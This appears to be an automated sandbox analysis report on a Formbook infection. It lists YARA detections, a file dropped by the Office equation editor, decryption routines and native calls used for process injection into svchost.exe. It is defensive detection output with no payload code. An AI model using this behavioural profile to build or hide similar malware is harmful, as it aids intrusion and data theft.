Source: 00000009.00000002.681191038.0000000000080000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.681191038.0000000000080000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.681249318.0000000000150000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.681249318.0000000000150000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.681218220.0000000000120000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.681218220.0000000000120000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000000.494897496.000000000968B000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000000.494897496.000000000968B000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
.NET source code contains very large strings
Source: vbc[1].exe.4.dr, Form1.cs Long String: Length: 38272
Source: vbc.exe.4.dr, Form1.cs Long String: Length: 38272
Source: 6.2.vbc.exe.f70000.2.unpack, Form1.cs Long String: Length: 38272
Source: 6.0.vbc.exe.f70000.0.unpack, Form1.cs Long String: Length: 38272
Source: 7.0.vbc.exe.f70000.0.unpack, Form1.cs Long String: Length: 38272
Source: 7.2.vbc.exe.f70000.5.unpack, Form1.cs Long String: Length: 38272
Yara signature match
Source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.514291085.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.514291085.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.513518262.0000000000330000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.513518262.0000000000330000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.513195165.0000000000130000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.513195165.0000000000130000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000000.503060559.000000000968B000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000000.503060559.000000000968B000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.478266756.0000000003429000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.478266756.0000000003429000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.681191038.0000000000080000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.681191038.0000000000080000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.681249318.0000000000150000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.681249318.0000000000150000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.681218220.0000000000120000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.681218220.0000000000120000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000000.494897496.000000000968B000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000000.494897496.000000000968B000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Detected potential crypto function
Source: C:\Users\Public\vbc.exe Code function: 6_2_00457888 6_2_00457888
Source: C:\Users\Public\vbc.exe Code function: 6_2_004590A8 6_2_004590A8
Source: C:\Users\Public\vbc.exe Code function: 6_2_00450168 6_2_00450168
Source: C:\Users\Public\vbc.exe Code function: 6_2_00455178 6_2_00455178
Source: C:\Users\Public\vbc.exe Code function: 6_2_00457120 6_2_00457120
Source: C:\Users\Public\vbc.exe Code function: 6_2_00458291 6_2_00458291
Source: C:\Users\Public\vbc.exe Code function: 6_2_00454BA9 6_2_00454BA9
Source: C:\Users\Public\vbc.exe Code function: 6_2_00456550 6_2_00456550
Source: C:\Users\Public\vbc.exe Code function: 6_2_00455578 6_2_00455578
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045B040 6_2_0045B040
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045B030 6_2_0045B030
Source: C:\Users\Public\vbc.exe Code function: 6_2_004578C8 6_2_004578C8
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045D8E8 6_2_0045D8E8
Source: C:\Users\Public\vbc.exe Code function: 6_2_004590A0 6_2_004590A0
Source: C:\Users\Public\vbc.exe Code function: 6_2_00455168 6_2_00455168
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045F980 6_2_0045F980
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045B250 6_2_0045B250
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045B260 6_2_0045B260
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045F388 6_2_0045F388
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045B4C8 6_2_0045B4C8
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045B4D8 6_2_0045B4D8
Source: C:\Users\Public\vbc.exe Code function: 6_2_00450519 6_2_00450519
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045DDD1 6_2_0045DDD1
Source: C:\Users\Public\vbc.exe Code function: 6_2_00454E28 6_2_00454E28
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045B6C0 6_2_0045B6C0
Source: C:\Users\Public\vbc.exe Code function: 6_2_00911C26 6_2_00911C26
Source: C:\Users\Public\vbc.exe Code function: 6_2_00911A38 6_2_00911A38
Source: C:\Users\Public\vbc.exe Code function: 6_2_00911740 6_2_00911740
Source: C:\Users\Public\vbc.exe Code function: 7_2_00401030 7_2_00401030
Source: C:\Users\Public\vbc.exe Code function: 7_2_0041B982 7_2_0041B982
Source: C:\Users\Public\vbc.exe Code function: 7_2_0041C184 7_2_0041C184
Source: C:\Users\Public\vbc.exe Code function: 7_2_0041CBAB 7_2_0041CBAB
Source: C:\Users\Public\vbc.exe Code function: 7_2_00408C60 7_2_00408C60
Source: C:\Users\Public\vbc.exe Code function: 7_2_0041B4A3 7_2_0041B4A3
Source: C:\Users\Public\vbc.exe Code function: 7_2_0041BD18 7_2_0041BD18
Source: C:\Users\Public\vbc.exe Code function: 7_2_00402D8A 7_2_00402D8A
Source: C:\Users\Public\vbc.exe Code function: 7_2_00402D90 7_2_00402D90
Source: C:\Users\Public\vbc.exe Code function: 7_2_00402FB0 7_2_00402FB0
Source: C:\Users\Public\vbc.exe Code function: 7_2_0092E0C6 7_2_0092E0C6
Source: C:\Users\Public\vbc.exe Code function: 7_2_0095D005 7_2_0095D005
Source: C:\Users\Public\vbc.exe Code function: 7_2_0094905A 7_2_0094905A
Source: C:\Users\Public\vbc.exe Code function: 7_2_00933040 7_2_00933040
Source: C:\Users\Public\vbc.exe Code function: 7_2_0092E2E9 7_2_0092E2E9
Source: C:\Users\Public\vbc.exe Code function: 7_2_009D1238 7_2_009D1238
Source: C:\Users\Public\vbc.exe Code function: 7_2_009563DB 7_2_009563DB
Source: C:\Users\Public\vbc.exe Code function: 7_2_0092F3CF 7_2_0092F3CF
Source: C:\Users\Public\vbc.exe Code function: 7_2_00932305 7_2_00932305
Source: C:\Users\Public\vbc.exe Code function: 7_2_00937353 7_2_00937353
Source: C:\Users\Public\vbc.exe Code function: 7_2_0097A37B 7_2_0097A37B
Source: C:\Users\Public\vbc.exe Code function: 7_2_00965485 7_2_00965485
Source: C:\Users\Public\vbc.exe Code function: 7_2_00941489 7_2_00941489
Source: C:\Users\Public\vbc.exe Code function: 7_2_0096D47D 7_2_0096D47D
Source: C:\Users\Public\vbc.exe Code function: 7_2_0094C5F0 7_2_0094C5F0
Source: C:\Users\Public\vbc.exe Code function: 7_2_0093351F 7_2_0093351F
Source: C:\Users\Public\vbc.exe Code function: 7_2_00976540 7_2_00976540
Source: C:\Users\Public\vbc.exe Code function: 7_2_00934680 7_2_00934680
Source: C:\Users\Public\vbc.exe Code function: 7_2_0093E6C1 7_2_0093E6C1
Source: C:\Users\Public\vbc.exe Code function: 7_2_0097A634 7_2_0097A634
Source: C:\Users\Public\vbc.exe Code function: 7_2_009D2622 7_2_009D2622
Source: C:\Users\Public\vbc.exe Code function: 7_2_009B579A 7_2_009B579A
Source: C:\Users\Public\vbc.exe Code function: 7_2_0093C7BC 7_2_0093C7BC
Source: C:\Users\Public\vbc.exe Code function: 7_2_009657C3 7_2_009657C3
Source: C:\Users\Public\vbc.exe Code function: 7_2_009CF8EE 7_2_009CF8EE
Source: C:\Users\Public\vbc.exe Code function: 7_2_0093C85C 7_2_0093C85C
Source: C:\Users\Public\vbc.exe Code function: 7_2_0095286D 7_2_0095286D
Source: C:\Users\Public\vbc.exe Code function: 7_2_009D098E 7_2_009D098E
Source: C:\Users\Public\vbc.exe Code function: 7_2_009329B2 7_2_009329B2
Source: C:\Users\Public\vbc.exe Code function: 7_2_009469FE 7_2_009469FE
Source: C:\Users\Public\vbc.exe Code function: 7_2_009B5955 7_2_009B5955
Source: C:\Users\Public\vbc.exe Code function: 7_2_009E3A83 7_2_009E3A83
Source: C:\Users\Public\vbc.exe Code function: 7_2_009DCBA4 7_2_009DCBA4
Source: C:\Users\Public\vbc.exe Code function: 7_2_009BDBDA 7_2_009BDBDA
Source: C:\Users\Public\vbc.exe Code function: 7_2_0092FBD7 7_2_0092FBD7
Source: C:\Users\Public\vbc.exe Code function: 7_2_00957B00 7_2_00957B00
Source: C:\Users\Public\vbc.exe Code function: 7_2_009CFDDD 7_2_009CFDDD
Source: C:\Users\Public\vbc.exe Code function: 7_2_00960D3B 7_2_00960D3B
Source: C:\Users\Public\vbc.exe Code function: 7_2_0093CD5B 7_2_0093CD5B
Source: C:\Users\Public\vbc.exe Code function: 7_2_00962E2F 7_2_00962E2F
Source: C:\Users\Public\vbc.exe Code function: 7_2_0094EE4C 7_2_0094EE4C
Source: C:\Users\Public\vbc.exe Code function: 7_2_00940F3F 7_2_00940F3F
Source: C:\Users\Public\vbc.exe Code function: 7_2_0095DF7C 7_2_0095DF7C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009FE0C6 9_2_009FE0C6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00A2D005 9_2_00A2D005
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00A03040 9_2_00A03040
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00A1905A 9_2_00A1905A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009FE2E9 9_2_009FE2E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00AA1238 9_2_00AA1238
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00AA63BF 9_2_00AA63BF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009FF3CF 9_2_009FF3CF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00A263DB 9_2_00A263DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00A02305 9_2_00A02305
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00A4A37B 9_2_00A4A37B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00A07353 9_2_00A07353
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00A35485 9_2_00A35485
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00A11489 9_2_00A11489
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00A3D47D 9_2_00A3D47D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00A1C5F0 9_2_00A1C5F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00A0351F 9_2_00A0351F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00A46540 9_2_00A46540
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00A04680 9_2_00A04680
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00A0E6C1 9_2_00A0E6C1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00AA2622 9_2_00AA2622
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00A4A634 9_2_00A4A634
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00A0C7BC 9_2_00A0C7BC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00A8579A 9_2_00A8579A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00A357C3 9_2_00A357C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00A9F8EE 9_2_00A9F8EE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00A2286D 9_2_00A2286D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00A0C85C 9_2_00A0C85C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00A029B2 9_2_00A029B2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00AA098E 9_2_00AA098E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00A169FE 9_2_00A169FE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00A85955 9_2_00A85955
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00AB3A83 9_2_00AB3A83
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00AACBA4 9_2_00AACBA4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009FFBD7 9_2_009FFBD7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00A8DBDA 9_2_00A8DBDA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00A27B00 9_2_00A27B00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00A9FDDD 9_2_00A9FDDD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00A30D3B 9_2_00A30D3B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00A0CD5B 9_2_00A0CD5B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00A32E2F 9_2_00A32E2F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00A1EE4C 9_2_00A1EE4C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00A9CFB1 9_2_00A9CFB1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00A10F3F 9_2_00A10F3F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00A2DF7C 9_2_00A2DF7C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0009C184 9_2_0009C184
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0009B4A3 9_2_0009B4A3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0009B982 9_2_0009B982
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0009CBAB 9_2_0009CBAB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00088C60 9_2_00088C60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00082D8A 9_2_00082D8A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00082D90 9_2_00082D90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00082FB0 9_2_00082FB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_008467C7 9_2_008467C7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00845062 9_2_00845062
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_008432FF 9_2_008432FF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00843302 9_2_00843302
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00841362 9_2_00841362
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_008475B2 9_2_008475B2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_008408F9 9_2_008408F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00840902 9_2_00840902
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 00A6F970 appears 81 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 00A43F92 appears 132 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 00A4373B appears 238 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 009FE2A8 appears 38 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 009FDF5C appears 118 times
Source: C:\Users\Public\vbc.exe Code function: String function: 0099F970 appears 81 times
Source: C:\Users\Public\vbc.exe Code function: String function: 00973F92 appears 108 times
Source: C:\Users\Public\vbc.exe Code function: String function: 0097373B appears 238 times
Source: C:\Users\Public\vbc.exe Code function: String function: 0092E2A8 appears 38 times
Source: C:\Users\Public\vbc.exe Code function: String function: 0092DF5C appears 118 times
Contains functionality to call native functions
Source: C:\Users\Public\vbc.exe Code function: 7_2_004181C0 NtCreateFile, 7_2_004181C0
Source: C:\Users\Public\vbc.exe Code function: 7_2_00418270 NtReadFile, 7_2_00418270
Source: C:\Users\Public\vbc.exe Code function: 7_2_004182F0 NtClose, 7_2_004182F0
Source: C:\Users\Public\vbc.exe Code function: 7_2_004183A0 NtAllocateVirtualMemory, 7_2_004183A0
Source: C:\Users\Public\vbc.exe Code function: 7_2_0041826D NtReadFile, 7_2_0041826D
Source: C:\Users\Public\vbc.exe Code function: 7_2_0041839A NtAllocateVirtualMemory, 7_2_0041839A
Source: C:\Users\Public\vbc.exe Code function: 7_2_009200C4 NtCreateFile,LdrInitializeThunk, 7_2_009200C4
Source: C:\Users\Public\vbc.exe Code function: 7_2_00920048 NtProtectVirtualMemory,LdrInitializeThunk, 7_2_00920048
Source: C:\Users\Public\vbc.exe Code function: 7_2_00920078 NtResumeThread,LdrInitializeThunk, 7_2_00920078
Source: C:\Users\Public\vbc.exe Code function: 7_2_009207AC NtCreateMutant,LdrInitializeThunk, 7_2_009207AC
Source: C:\Users\Public\vbc.exe Code function: 7_2_0091F9F0 NtClose,LdrInitializeThunk, 7_2_0091F9F0
Source: C:\Users\Public\vbc.exe Code function: 7_2_0091F900 NtReadFile,LdrInitializeThunk, 7_2_0091F900
Source: C:\Users\Public\vbc.exe Code function: 7_2_0091FAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 7_2_0091FAD0
Source: C:\Users\Public\vbc.exe Code function: 7_2_0091FAE8 NtQueryInformationProcess,LdrInitializeThunk, 7_2_0091FAE8
Source: C:\Users\Public\vbc.exe Code function: 7_2_0091FBB8 NtQueryInformationToken,LdrInitializeThunk, 7_2_0091FBB8
Source: C:\Users\Public\vbc.exe Code function: 7_2_0091FB68 NtFreeVirtualMemory,LdrInitializeThunk, 7_2_0091FB68
Source: C:\Users\Public\vbc.exe Code function: 7_2_0091FC90 NtUnmapViewOfSection,LdrInitializeThunk, 7_2_0091FC90
Source: C:\Users\Public\vbc.exe Code function: 7_2_0091FC60 NtMapViewOfSection,LdrInitializeThunk, 7_2_0091FC60
Source: C:\Users\Public\vbc.exe Code function: 7_2_0091FD8C NtDelayExecution,LdrInitializeThunk, 7_2_0091FD8C
Source: C:\Users\Public\vbc.exe Code function: 7_2_0091FDC0 NtQuerySystemInformation,LdrInitializeThunk, 7_2_0091FDC0
Source: C:\Users\Public\vbc.exe Code function: 7_2_0091FEA0 NtReadVirtualMemory,LdrInitializeThunk, 7_2_0091FEA0
Source: C:\Users\Public\vbc.exe Code function: 7_2_0091FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 7_2_0091FED0
Source: C:\Users\Public\vbc.exe Code function: 7_2_0091FFB4 NtCreateSection,LdrInitializeThunk, 7_2_0091FFB4
Source: C:\Users\Public\vbc.exe Code function: 7_2_009210D0 NtOpenProcessToken, 7_2_009210D0
Source: C:\Users\Public\vbc.exe Code function: 7_2_00920060 NtQuerySection, 7_2_00920060
Source: C:\Users\Public\vbc.exe Code function: 7_2_009201D4 NtSetValueKey, 7_2_009201D4
Source: C:\Users\Public\vbc.exe Code function: 7_2_0092010C NtOpenDirectoryObject, 7_2_0092010C
Source: C:\Users\Public\vbc.exe Code function: 7_2_00921148 NtOpenThread, 7_2_00921148
Source: C:\Users\Public\vbc.exe Code function: 7_2_0091F8CC NtWaitForSingleObject, 7_2_0091F8CC
Source: C:\Users\Public\vbc.exe Code function: 7_2_00921930 NtSetContextThread, 7_2_00921930
Source: C:\Users\Public\vbc.exe Code function: 7_2_0091F938 NtWriteFile, 7_2_0091F938
Source: C:\Users\Public\vbc.exe Code function: 7_2_0091FAB8 NtQueryValueKey, 7_2_0091FAB8
Source: C:\Users\Public\vbc.exe Code function: 7_2_0091FA20 NtQueryInformationFile, 7_2_0091FA20
Source: C:\Users\Public\vbc.exe Code function: 7_2_0091FA50 NtEnumerateValueKey, 7_2_0091FA50
Source: C:\Users\Public\vbc.exe Code function: 7_2_0091FBE8 NtQueryVirtualMemory, 7_2_0091FBE8
Source: C:\Users\Public\vbc.exe Code function: 7_2_0091FB50 NtCreateKey, 7_2_0091FB50
Source: C:\Users\Public\vbc.exe Code function: 7_2_0091FC30 NtOpenProcess, 7_2_0091FC30
Source: C:\Users\Public\vbc.exe Code function: 7_2_00920C40 NtGetContextThread, 7_2_00920C40
Source: C:\Users\Public\vbc.exe Code function: 7_2_0091FC48 NtSetInformationFile, 7_2_0091FC48
Source: C:\Users\Public\vbc.exe Code function: 7_2_00921D80 NtSuspendThread, 7_2_00921D80
Source: C:\Users\Public\vbc.exe Code function: 7_2_0091FD5C NtEnumerateKey, 7_2_0091FD5C
Source: C:\Users\Public\vbc.exe Code function: 7_2_0091FE24 NtWriteVirtualMemory, 7_2_0091FE24
Source: C:\Users\Public\vbc.exe Code function: 7_2_0091FFFC NtCreateProcessEx, 7_2_0091FFFC
Source: C:\Users\Public\vbc.exe Code function: 7_2_0091FF34 NtQueueApcThread, 7_2_0091FF34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009F00C4 NtCreateFile,LdrInitializeThunk, 9_2_009F00C4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009F07AC NtCreateMutant,LdrInitializeThunk, 9_2_009F07AC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009EF9F0 NtClose,LdrInitializeThunk, 9_2_009EF9F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009EF900 NtReadFile,LdrInitializeThunk, 9_2_009EF900
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009EFAB8 NtQueryValueKey,LdrInitializeThunk, 9_2_009EFAB8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009EFAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 9_2_009EFAD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009EFAE8 NtQueryInformationProcess,LdrInitializeThunk, 9_2_009EFAE8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009EFBB8 NtQueryInformationToken,LdrInitializeThunk, 9_2_009EFBB8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009EFB50 NtCreateKey,LdrInitializeThunk, 9_2_009EFB50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009EFB68 NtFreeVirtualMemory,LdrInitializeThunk, 9_2_009EFB68
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009EFC60 NtMapViewOfSection,LdrInitializeThunk, 9_2_009EFC60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009EFD8C NtDelayExecution,LdrInitializeThunk, 9_2_009EFD8C
